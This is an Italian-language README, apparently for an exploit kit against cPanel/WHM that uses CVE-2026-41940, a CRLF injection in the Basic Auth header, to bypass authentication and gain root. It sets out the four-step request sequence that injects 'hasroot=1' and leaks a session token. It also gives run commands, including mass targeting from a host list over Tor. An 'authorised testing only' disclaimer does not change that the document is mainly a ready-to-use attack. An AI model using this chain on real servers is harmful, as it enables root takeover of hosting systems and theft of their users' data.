
cPanel/WHM CVE-2026-41940 exploit per bypass dell'autenticazione tramite iniezione CRLF
Kit di test di sicurezza per cPanel/WHM. Implementa il bypass dell'autenticazione tramite iniezione CRLF CVE-2026-41940 e il pivot dei privilegi post-exploitation.
| Script | Scopo |
|---|---|
cpanel_exploit.py | CVE-2026-41940: iniezione CRLF → bypass autenticazione WHM → accesso root |
Tipo: Iniezione CRLF → Bypass dell'autenticazione → RCE come root
Interessati: cPanel/WHM < versioni patchate
Attacco: L'iniezione CRLF pre-autenticazione nell'header Basic Auth inietta nel file di sessione lato server, elevando una sessione non autenticata a root WHM.
hasroot=1Fase 1: POST /login/?login_only=1 → genera sessione pre-autenticazione
Fase 2: GET / Authorization:Basic <CRLF> → inietta hasroot=1, fa trapelare il token cpsess
Fase 3: GET /scripts2/listaccts → attiva il gadget di propagazione della cache di sessione
Fase 4: GET /cpsess[TOKEN]/json-api/version → HTTP 200 + versione = ACCESSO ROOT
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only # solo controllo CRLF, nessuna escalation privilegi
Solo per test di penetrazione autorizzati.